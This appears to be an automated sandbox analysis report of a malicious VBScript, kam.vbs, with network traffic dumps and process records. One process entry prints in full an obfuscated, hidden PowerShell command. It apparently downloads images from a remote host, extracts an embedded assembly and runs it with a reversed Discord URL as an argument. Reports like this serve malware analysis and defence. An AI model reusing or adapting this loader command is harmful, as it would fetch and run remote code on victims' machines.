        2024-05-27 13:21:11 UTC1369INData Raw: 06 c9 2d 5c 6d c4 1f 54 e1 fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a b2 58 9b af 86 10 6a 83 70 c4 13 ef ed 88 ec 2c c7 a8 ac a9 47 57 ba 24 55 f1 81 a3 bd 9d 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 0a
        Data Ascii: -\mTr7qLz2iO7ZsiA%nGR?{O|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a
        2024-05-27 13:21:11 UTC1369INData Raw: d7 07 8b 3e f8 03 32 f9 ca c8 48 50 a3 af 73 92 1d 11 95 63 62 c2 b9 b1 9d 2e 98 46 14 06 1e af a8 c1 24 65 25 00 b0 2a 7a 9f 86 06 ae 85 92 2a 49 4d b1 4a a0 2e af 17 d5 44 04 a0 d9 00 37 e1 be b8 7d 23 23 48 18 20 6d b6 07 6c 36 a5 d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8
        Data Ascii: >2HPscb.F$e%*z*IMJ.D7}##H ml6fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW|Rm\LITUTVlD#v aT@v@b
        2024-05-27 13:21:11 UTC1369INData Raw: 1b 3a cd 34 1e 1a 3c a4 52 cc a5 76 d0 0c 4f 4b 61 78 1e 78 15 7e ab 7f 0c 63 4e 88 d2 84 31 17 b1 e9 50 c5 6b ea 30 22 c0 e2 f7 77 1d 86 71 90 af 73 7f 0c 0d 43 a1 a5 e3 4c a6 bb 89 5b 8f 9f a7 2a fa 22 bb 6f 4c b4 4d 7a 64 6a fa f1 8a c1 ac 9c cf 12 99 a6 71 b8 0d aa c6 cf 3d 33 d1 ce ea fa 56 31 a2 db 10 9c 80 6f ad 8a 3d aa ef 9c 0c 73 a0 43 75 a6 5a 06 8d cc c3 fa 67 2e 89 28 56 91 48 3d 0f 9a 48 fc eb 3d 01 82 3f 3b 72 a4 61 aa ba 00 55 7d 85 0e 9f 5c 21 86 c0 b0 a4 7b 0c 0f 3c 34 4a c7 8d 3a 90 3f fb 69 e3 ff 00 0e 17 4f e0 b3 4f 32 bc 5a 55 5e 6c 39 9d 97 69 1d 0f e1 eb 79 b8 23 8d 48 a2 01 ec 08 b1 92 0c 85 c9 f3 4d 8f 73 55 80 ac fe 0b 0e b3 c4 97 59 1c ac b2 ab 2b 48 cc cb 6a 55 46 d2 ab 55 46 8d df 4f 8f 4c c7 d4 e8 9b 4f 3e a4 69 b4 10 88 a1
        Data Ascii: :4<RvOKaxx~cN1Pk0"wqsCL[*"oLMzdjq=3V1o=sCuZg.(VH=H=?;raU}\!{<4J:?iOO2ZU^l9iy#HMsUY+HjUFUFOLO>i
        2024-05-27 13:21:11 UTC1369INData Raw: 5a b4 72 3a 06 01 54 90 2e fa 66 7b a3 f9 62 40 a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87 d3 cd
        Data Ascii: Zr:T.f{b@]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk}
        2024-05-27 13:21:11 UTC1369INData Raw: 82 31 dd 47 db 1d 13 85 1f 76 75 23 8f 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1 aa a8
        Data Ascii: 1Gvu#MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8r
        2024-05-27 13:21:11 UTC1369INData Raw: d0 9f 6c 57 5f 34 2f a5 6d 8c cd d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03
        Data Ascii: lW_4/mnq#O**!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};|1zwr80/`vI<R@i*$!@
        2024-05-27 13:21:11 UTC1369INData Raw: b1 de f9 ce 8b 40 74 f1 23 89 4b 32 c8 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07
        Data Ascii: @t#K2d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU|JG4]Crj4825A=G=pG/|v>*M)phJeenBx}66Ov$EZX\:2A hC


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        3192.168.2.649720162.159.134.233443616C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        TimestampBytes transferredDirectionData
        2024-05-27 13:21:22 UTC220OUTGET /attachments/1235627023511191643/1243620582747148318/kam.txt?ex=6652236c&is=6650d1ec&hm=afcc5574f2560bcf3322ef90651e1d0de12edfc025d553d21405e59d12521986& HTTP/1.1
        Host: cdn.discordapp.com
        Connection: Keep-Alive
        2024-05-27 13:21:23 UTC1047INHTTP/1.1 404 Not Found
        Date: Mon, 27 May 2024 13:21:22 GMT
        Content-Type: text/plain;charset=UTF-8
        Content-Length: 36
        Connection: close
        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
        Set-Cookie: __cf_bm=0mrBYZPux09FrNH7qF46RvKw4xN8mgCUUXbpZEHi5a0-1716816082-1.0.1.1-gA1S7WfoiDHlqth_Q.0KWt56IJPSGy1IJ3aiNJTJ35xOrGAdYo7OYuZMkT4dmNV9wOpDdFpSn0f.Fcj84uAAOQ; path=/; expires=Mon, 27-May-24 13:51:22 GMT; domain=.discordapp.com; HttpOnly; Secure
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i1mm3dOG7lZk%2F9UZdAHH340u7NEJkHuuyOm3yQXo5tqyauSud2CUtXNRpfs4DQKUiV5EO7SoFtPMMLqiEExOuszP3Wat4lPPDjQsMzfs68%2BYnHNeuREFC9mx8%2BIZGXcrupL0PQ%3D%3D"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        Set-Cookie: _cfuvid=KnuSFznkcmGwng_2q6jYx8JxFiET3VpAEvkeyFm2YWE-1716816082969-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
        Server: cloudflare
        CF-RAY: 88a64ec67b6641e1-EWR
        alt-svc: h3=":443"; ma=86400
        2024-05-27 13:21:23 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
        Data Ascii: This content is no longer available.


        Click to jump to process

        Click to jump to process

        Click to dive into process behavior distribution

        Click to jump to process

        Target ID:0
        Start time:09:21:01
        Start date:27/05/2024
        Path:C:\Windows\System32\wscript.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\kam.vbs"
        Imagebase:0x7ff7f0170000
        File size:170'496 bytes
        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
        Has elevated privileges:false
        Has administrator privileges:false
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:3
        Start time:09:21:03
        Start date:27/05/2024
        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreCYDgTreNgDgTre4DgTreDkDgTreMQDgTreyDgTreDUDgTreMgDgTrexDgTreGQDgTreOQDgTre1DgTreGUDgTreNQDgTrewDgTreDQDgTreMQDgTreyDgTreGQDgTreMwDgTre1DgTreDUDgTreZDgTreDgTre1DgTreDIDgTreMDgTreBjDgTreGYDgTreZDgTreBlDgTreDIDgTreMQBlDgTreGQDgTreMDgTreBkDgTreDEDgTreZQDgTrexDgTreDUDgTreNgDgTrewDgTreDkDgTreZgBlDgTreDIDgTreMgDgTrezDgTreDMDgTreZgBjDgTreGIDgTreMDgTreDgTre2DgTreDUDgTreMgBmDgTreDQDgTreNwDgTre1DgTreDUDgTreYwBjDgTreGYDgTreYQDgTre9DgTreG0DgTreaDgTreDgTremDgTreGMDgTreZQDgTrexDgTreGQDgTreMDgTreDgTre1DgTreDYDgTreNgDgTre9DgTreHMDgTreaQDgTremDgTreGMDgTreNgDgTrezDgTreDIDgTreMgDgTre1DgTreDYDgTreNgDgTre9DgTreHgDgTreZQDgTre/DgTreHQDgTreeDgTreB0DgTreC4DgTrebQBhDgTreGsDgTreLwDgTre4DgTreDEDgTreMwDgTre4DgTreDQDgTreMQDgTre3DgTreDQDgTreNwDgTreyDgTreDgDgTreNQDgTrewDgTreDIDgTreNgDgTrezDgTreDQDgTreMgDgTrexDgTreC8DgTreMwDgTre0DgTreDYDgTreMQDgTre5DgTreDEDgTreMQDgTrexDgTreDUDgTreMwDgTreyDgTreDDgTreDgTreNwDgTreyDgTreDYDgTreNQDgTrezDgTreDIDgTreMQDgTrevDgTreHMDgTredDgTreBuDgTreGUDgTrebQBoDgTreGMDgTreYQB0DgTreHQDgTreYQDgTrevDgTreG0DgTrebwBjDgTreC4DgTrecDgTreBwDgTreGEDgTreZDgTreByDgTreG8DgTreYwBzDgTreGkDgTreZDgTreDgTreuDgTreG4DgTreZDgTreBjDgTreC8DgTreLwDgTre6DgTreHMDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreMQDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreQwDgTre6DgTreFwDgTreUDgTreByDgTreG8DgTreZwByDgTreGEDgTrebQBEDgTreGEDgTredDgTreBhDgTreFwDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGMDgTrebwBnDgTreG4DgTreaQB0DgTreGkDgTredgBvDgTreCcDgTreLDgTreDgTrenDgTreFIDgTreZQBnDgTreEEDgTrecwBtDgTreCcDgTreLDgTreDgTrenDgTreCcDgTreKQDgTrepDgTreH0DgTreIDgTreB9DgTreDgTre==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
        Imagebase:0x7ff6e3d50000
        File size:452'608 bytes
        MD5 hash:04029E121A0CFA5991749937DD22A1D9
        Has elevated privileges:false
        Has administrator privileges:false
